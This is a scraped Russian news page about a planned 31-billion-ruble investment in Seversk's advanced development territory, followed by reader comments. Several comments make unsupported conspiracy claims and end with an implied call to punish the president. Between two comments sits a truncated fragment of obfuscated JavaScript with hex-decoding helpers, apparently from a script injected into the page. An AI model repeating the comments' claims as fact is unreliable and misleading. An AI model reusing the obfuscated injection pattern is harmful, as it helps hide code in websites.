Последние комментарии:

четыре часа назад написал rudolf
вчера в 12:02 написал ponni
17.08.2019 11:19 написал EPMAK
17.08.2019 11:10 написал EPMAK
17.08.2019 10:33 написал HCRV
17.08.2019 10:22 написал npocTo_BURLIK
17.08.2019 08:49 написал f1gv83
16.08.2019 21:37 написал Ст. урядник
15.08.2019 23:04 написал profi
15.08.2019 13:17 написал Avedi
15.08.2019 12:08 написал Иваныч
15.08.2019 10:33 написал vetroks
15.08.2019 08:42 написал cuska
14.08.2019 22:51 написал navator
14.08.2019 21:21 написал Bars62


В северскую ТОР вложат 31 миллиард рублей


В северскую ТОР вложат 31 миллиард рублей

Сегодня, 14 января, губернатор Томской области Сергей Жвачкин принял участие в экспертной дискуссии «Инвестиции в новые промышленные точки роста: будущее территорий опережающего развития (ТОР) в моногородах и ЗАТО». Дискуссия прошла в Российской Академии народного хозяйства и государственной службы при Президенте РФ на Гайдаровском форуме по инициативе Томской области.

Глава региона рассказал участникам встречи, что проект создания в Северске территории опережающего развития является частью федерального проекта «ИНО Томск» и направлен на развитие в регионе высокотехнологичных производств. Северская ТОР будет специализироваться на химических технологиях. В том числе в ЗАТО будут созданы производства металлического бериллия, диоксида титана, ионообменных смол, субстанций гепарина, готовых лекарственных форм и другие.

Как отметил томский губернатор, частные инвесторы готовы вложить в 18 проектов (поддержанных в «Росатоме» и рабочей группой федерального проекта «ИНО Томск») 31 миллиард рублей, создав около 2,5 тысячи новых рабочих мест.

«Наличие в Северске свободных земельных участков и мощностей — одно из наших конкурентных преимуществ, — подчеркнул губернатор Томской области Сергей Жвачкин. — Оно позволяет нам планировать работу по привлечению дополнительных резидентов, уже начиная с этого года».

В северскую ТОР вложат 31 миллиард рублей

Как сказал губернатор, областная власть оценивает потребность бюджетных инвестиций в создание инфраструктуры ТОР в 270 миллионов рублей в течение 2017–2018 годов.

«Могу твердо сказать, что 160 миллионов из областного бюджета мы вложим в этом году, еще 180 миллионов рублей составят частные инвестиции», — сказал томский губернатор.

Для ускорения процесса создания территории опережающего развития и запуска новых производств глава региона внес ряд предложений. В частности, он отметил необходимость решения вопроса использования земли, находящейся в федеральной собственности, расширения границ ТОР за пределы ЗАТО, наделения «Росатома» полномочиями по сопровождению проектов, межведомственной координации и верной маркетинговой стратегии.

«Территории опережающего развития — это возможность для государства создать новые передовые производства в национальном масштабе с опорой на уникальный опыт закрытых городов-наукоградов, — подчеркнул на встрече Сергей Жвачкин. — Минэкономразвития, Минпромторг и «Росатом» сегодня понимают значение этого процесса, необходимо, чтобы это понимание было и у остальных ведомств».

С мнением томского губернатора согласился глава Красноярского края Виктор Толоконский.

«Для инвесторов налоговые льготы не главное, они пойдут за средой, которая существует в Томске и Северске. ТОР станет хорошим дополнением к этой среде», — поддержал Сергея Жвачкина Виктор Толоконский.

В северскую ТОР вложат 31 миллиард рублей





Категория: Новости » Северск » Общество

Комментарии: (23) 

14 января 2016   -4

Информация

Посетители, находящиеся в группе Гости, не могут оставлять комментарии в данной новости.
 

Комментарий № 1:

Написал: Мефодий
спасибо,поржал)

Комментарий № 2:

Написал: semenovna
Будем надеяться, что не разворуют и хоть что-нибудь там заработает

Комментарий № 3:

Написал: Skyrex
Хотят создать производство металлического бериллия! am А вы знаете, уважаемые, о чрезвычайной токсичности бериллия? Ругаем "ядерную помойку", и тут же  строим канцерогенный завод! У-Р-А!

Комментарий № 4:

Написал: Пуля
Уж больно куш,
здесь очень сладкий,
чтобы уйти , от искушения;
и мне сдаётся, что ''посадки''
увидим все, до завершения.

Комментарий № 5:

Написал: Афоня
а простому народу что от вашего тор ?????   скорее это  ТОР  надо понимать как территория обязательного  разворовывания !!! хватит придумывать схемы с нано  чубайсовскими городками по распилу денег... переводу стрелок ...  еб  мобилей  0 промиле ... иодированной водой  ... нано лампами и т. д...... список бесконечен...   просто создавайте рабочие места для людей а не для себя !!!!!

Комментарий № 6:

Написал: cuska
Лучше бы дороги привели в порядок, а то этой весной бует полный капец!

Комментарий № 7:

Написал: Kapitalin-nike
"В северскую ТОР вложат 31 миллиард рублей"                                     В переводе на человеческий язык это значит: В северской "чёрной дыре" в ближайшее время будут разворованы 31 млрд рублей!

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "vseverske.info"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Комментарий № 8:

Написал: улитыч
Нормально! Попилим касики!

Комментарий № 9:

Написал: zxc
Уинстон Черчилль «Политический талант заключается в умении предсказать, что может произойти завтра, на следующей неделе, через месяц, через год. А потом объяснитьпочему этого не произошло

Комментарий № 10:

Написал: лавандос
Skyrex,
 А ртуть( ну, точнее  пары) токсичны не менее. Да вот только хапнуть , -шанс многократнее высок. Лампы энергосберегающие, термометры ртутные , да мало ли откуда ещё(?) Не только ртуть. Там и свинец , который распространен в обиходе,да в конце концов аллюминий, в виде столовых приборов  ,тоже  крепкому здоровью не способствует., А ещё когда люди увидели паровоз, то некоторые даже умерли от разрыва сердца. Даа.

Комментарий № 11:

Написал: лавандос
Skyrex,
Кстати рекомендую квартирку проверить  на радон и  всякие прочие  "нямки"

Комментарий № 12:

Написал: semenovna
лавандос,

и ещё держаться подальше от автомобилей. За прошлый год в области 108 человек в ДТП погибло.

Комментарий № 13:

Написал: Halif
Ну теперь заживёт Заколючинск )))

Комментарий № 14:

Написал: Землянин

«… По информации Комиссии по борьбе с коррупцией в высших эшелонах власти … имеются документально подтвержденные данные о незаконном вывозе из России в период с 1990 года по сегодняшнее время более 1300 тонн золота, большого количества денег, нефти, стали, алмазов и других ценностей, которые в настоящее время являются фактически активами России, размещенными на десятках счетов зарубежных банков на общую сумму более 4 триллионов долларов США, что составляет более 25 ежегодных бюджетов России…

В докладе указано, что «исходя из материалов многих уголовных дел, тех документов, что обнаружены последнее время в разных органах по АСЭР “Тан” видно, что к формированию и получению денег от незаконно вывезенного золота, алмазов, нефти, стали, заказных многочисленных убийствах имеют отношение следующие высокопоставленные госчиновники: …Е.Гайдар, …, С. Кириенко

Материалы доклада являются лишь частью особо тяжких признаков преступлений в нашей стране, связанных с враждебной деятельностью в ущерб внешней безопасности Российской Федерации, однако направленных на разрушение объектов жизнеобеспечения населения, в целях подрыва жизни и деятельности народов России, проживающих на соответствующей территории, экономической безопасности и обороноспособности России…» - «Элитные воры вывезли из России 25 годовых бюджетов» - http://rkrp-rpk.ru/content/view/3534/82/

Комментарий № 15:

Написал: Землянин

Гайдаровский форум, о котором в статье – это воровской сходняк, носящий имя мрази Гайдара.

«…Во все времена и у всех народов были люди желающие присвоить (украсть) чужое имущество. Собственность по-научному. И не имело значения чью собственность воровали: личную, племени, государства. Вор во всех случаях оставался вором. Его лишали головы, руки, ноздрей или свободы в зависимости от вкусов обокраденных обывателей. И самая важная заповедь гласила – не укради… Но самое отвратительное – постоянные попытки превратить мерзкую личность ренегата Гайдара в подобие Христа, отдавшего жизнь за людей. Энциклопедически образован, кристально честен, яркий талант, совесть нации – все это ренегату, серой убогой личности, обжоре и пьянице, презиравшему физический труд. Читал две его книги и удивлялся нудной серости и полному отсутствию объективности, необходимой ученому… » - Дмитрий Трофимов «Евангелие от Чубайса» (http://forum-msk.org/material/economic/9040202.html )

Комментарий № 16:

Написал: Skyrex
улитыч,
Это дело я люблю, это дело я люблю, все на свете я П-И-Л-Ю-Ю-Ю!!!

Комментарий № 17:

Написал: Skyrex
лавандос, Приглашай, приедем с лабораторией , проверим angry

Комментарий № 18:

Написал: BVD
Лучше бы этот Жвачкин вместн с Шаминымподумали, что делать с панельными Хрущебами, построенными в 1962 и 1995годов, которые от дряхлости  начнут сыпаться и могут быть жертвы.

Комментарий № 19:

Написал: Землянин
Цитата: BVD
Лучше бы этот Жвачкин вместн с Шаминым подумали
 

Жвачкину и Шамину запрещено думать теми, кто их назначил на должности. На воровской сходняк этих персонажей позвали для того, чтобы убедиться в их способности обеспечить возможность паразитирования мрази на народе.

Жвачкину приказано вешать народу лапшу на уши про ТОР, инвестиции, высокотехнологичные производства, 2,5 тысячи рабочих мест,.. скрывая преступное происхождение средств инвесторов (http://rkrp-rpk.ru/content/view/3534/82/ ) и, что «…Главными хозяевами и господами на территориях станут резиденты, которые будут функционировать по специальным правилам. Они якобы и будут заниматься «опережающим социально-экономическим развитием» территорий, вкладывая свои инвестиции.» - http://forum-msk.org/material/region/10726390.html   

Комментарий № 20:

Написал: BVD
Кузьменко славился тем,что говорил: "избирайте меня,я знаю как в верхах деньги выпрашивать", но толку от этого никакого небыло, а сейчас чиновники хвалят друг друга, все врут и мечты их не сбываются.

Комментарий № 21:

Написал: BVD
Агенты влияния Горбачев, Ельцин много сделали по развалу СССР и РСФСР, никто их не осудил как преступников, растащили все,что могли.

Комментарий № 22:

Написал: Землянин
Цитата: BVD
все врут и мечты их не сбываются
 
У тварных мечты отсутствуют – у них план, которого они и придерживаются. На воровском сходняке, о котором в статье, пахан «Владимир Путин призвал кабмин быть готовым к любому развитию ситуации в экономике» - http://www.youtube.com/watch?v=XDURloF3zvs , вплоть до контролируемого каннибализма и уничтожения тех, кого мрази объявят «врагом народа». Соответствующее заявления уже сделал Рамзан Кадыров - http://via-midgard.info/news/kadyrov-pridyot-dan-na-rossiyan-navedyot-o.htm . Закон о человеческих жертвоприношениях уже подготовлен. 

Комментарий № 23:

Написал: Землянин
Цитата: BVD
никто их не осудил как преступников
 
Пахана осудили  - «Военный трибунал над Путиным: считать преступником» - https://www.youtube.com/watch?v=ESaaNtQTrdY . Осталось привести приговор в исполнение.  
stroimguru.ru
Курс валюты:
65.99 61↓   $     73.22 27↓  

Опрос дня:

Вы бы хотели, чтобы город открыли?

Да, приглашу друзей/родственников   15.56%
   
Да, бизнес и инфраструктура начнет развиваться   24.44%
   
Нет, станет небезопасно   17.78%
   
Нет, мне и так хорошо. Соседство с Томском полностью удовлетворяет мои потребности   42.22%
   
Затрудняюсь ответить   0%
   
Всего голосов: 45

Все опросы >>

Архив статей: